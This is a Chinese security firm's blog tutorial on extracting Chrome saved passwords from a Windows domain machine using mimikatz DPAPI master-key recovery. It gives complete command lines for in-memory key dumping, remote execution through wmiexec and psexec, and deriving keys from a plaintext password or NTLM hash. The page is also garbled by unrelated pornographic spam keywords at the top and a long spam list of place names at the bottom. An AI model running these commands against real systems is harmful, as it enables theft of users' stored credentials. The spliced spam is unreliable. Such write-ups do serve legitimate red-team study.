老赵揉搓苏清雅双乳的视频_老头老太性行交视频_老同学3免费集_老师没戴套子C了我一天视频_老师的丰满大乳奶_老师把我添高潮了A片潘金莲

咨詢電話:400-6446-808

新聞動態

使用mimikatz導出chrome密碼
2022-08-01 00:00:00

 

寫在前面

古語有云:“學如逆水行舟,不進則退。”面對如今隨時都在變化的網絡安全環境更是如此。為此,創信華通微信公眾號特開設“滲透專欄”,以記錄創信華通創安攻防實驗室在滲透技術上的探索,加強同行間的交流,相互學習,共同進步。

 

 

 

?使用mimikatz導出chrome密碼

  2022.07.25

 

 

 

模擬場景

在獲取某PC本地administrator的權限情況下,導出使用該PC機域普通賬號的密碼。

受害機ip:

192.168.3.4

受害機賬戶:

 

· 本地管理員:administrator/toor

· 域普通賬戶:beta\fengjie/qqq123!@#

 

 

 

加密機制簡介

chrome儲存的明文密碼時使用windows提供的DPAPI進行對稱加密來保證安全性。加解密的密鑰稱為master key。master key被用戶登錄密碼、SID和16字節隨機數加密后保存在Master Key file(%APPDATA%\Microsoft\Protect\%SID%)中。

 

 

最簡單的情況:A用戶拖A自己的密碼

1

dpapi::chrome /in:'C:\Users\fengjie\AppData\Local\Google\Chromr\User

2

Data\Default\Login Data' /unprotect

 

 

在A用戶登陸狀態B解密A的chrome密碼

在用戶登陸狀態下可以直接用procdump或者mimikatz直接從內存中獲取master key。

1

privilege::debug

2

sekurlsa::dpapi

3

 

4

python wmiexec.py administrator:toor@192.168.3.4 'c:\users\public\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit'

 

Alt text

獲取到masterkey

1

0bf0be64d4dc768a543b3a12d7c5210d184c07a3861cad8f2bd8b7bbacc60fd0e06e955b6dad057d070d1ce3b2bb331fd8dbce6efad08808f1849e4f4ef26d80

1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d   

2

 

 

 

接下來用mimikatz一把梭就可以了

1

python wmiexec.py administrator:toor@192.168.3.4 'cd c:\users\public && Minimimini64.exe "dpapi::chrome

/in:\"C:\Users\fengjie\AppData\Local\Google\Chrome\User Data\Default\Login Data\" /masterkey:1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d" exit '

 

 

最開始用wmiexec并未解密成功

Alt text

后來發現是wmiexec的鍋換成psexec就好了(用smbexec也可以,懷疑是因為用wmiexec時令牌完整性受限的原因,知道的師傅請教我一手)

Alt text

 

在A用戶離線狀態B解密A的chrome密碼

現在用mimikatz重新抓已經抓不到fengjie的master key了

Alt text

用戶明文密碼已知

 

這種情況下有兩種方法可以選擇。

1.如果我們知道fengjie的明文密碼,可以用runas降權(或者進行一些spwan的操作降權),降權之后又回到了最簡單的情況。(因為runas需要交互式shell,所以這種方法比較雞肋)

1

runas /user:fengjie@beta.com "cmd.exe"

2

 

3

mimikatz dpapi::chrome /in:”%localappdata%\Google\Chrome\User

Data\Default\Cookies” /unprotect

 

2.在沒有交互式的情況下可以直接用mimikatz直接算出master key。

1

dpapi::masterkey 

/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8"

/password:qqq123!@#

 

Alt text

拿到master key后情況又相當于又轉換回了用戶在線的情景。

用戶明文密碼未知,知道NTLM hash

 

1

dpapi::masterkey 

/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8" 

/hash:632f6adad4510099d676724bfb87c6ee

 

Alt text

 

 

 

總結

簡單的說就是三種情況:

A用戶獲取自己chrome密碼不需要知道master key

A獲取B用戶,如果B用戶在線,那么可以直接從內存中抓取出B的maste key

A獲取B用戶,B不在線,就需要用b用戶的明文密碼或者NTLM hash計算出master key,在回到上面一步。

 

 

本文由創信華通創安攻防實驗室編輯。

本文僅限于個人學習和技術研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權攻擊等違法行為,均由使用者本人負責,本單位不為此承擔任何責任。創安攻防實驗室擁有對此文章的修改和解釋權,如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。

 

如有侵權,請聯系后臺。

 

 

 

創安攻防實驗室

創安攻防實驗室,是成都創信華通信息技術有限公司旗下的技術研究團隊,成立于2021年9月,主要研究紅藍對抗、重大安全保障、應急響應等方向。

創安攻防實驗室圓滿完成了多次公安舉辦的重要網絡安全保障和攻防演習活動,并積極參加各類網絡安全競賽,屢獲殊榮。

創安攻防實驗室秉承創信華通的發展理念,致力打造國內一流網絡安全團隊。

欢迎光临: 桃江县| 申扎县| 洛川县| 平江县| 壶关县| 惠水县| 肃宁县| 文化| 修文县| 梅州市| 武义县| 布尔津县| 崇信县| 广元市| 和政县| 弋阳县| 满城县| 巴林左旗| 泸水县| 遵义市| 通化市| 乐昌市| 阿坝县| 丘北县| 方正县| 九江市| 罗源县| 克什克腾旗| 武冈市| 崇明县| 洛浦县| 崇仁县| 探索| 石狮市| 北宁市| 城口县| 铜陵市| 紫云| 巴林左旗| 曲水县| 本溪|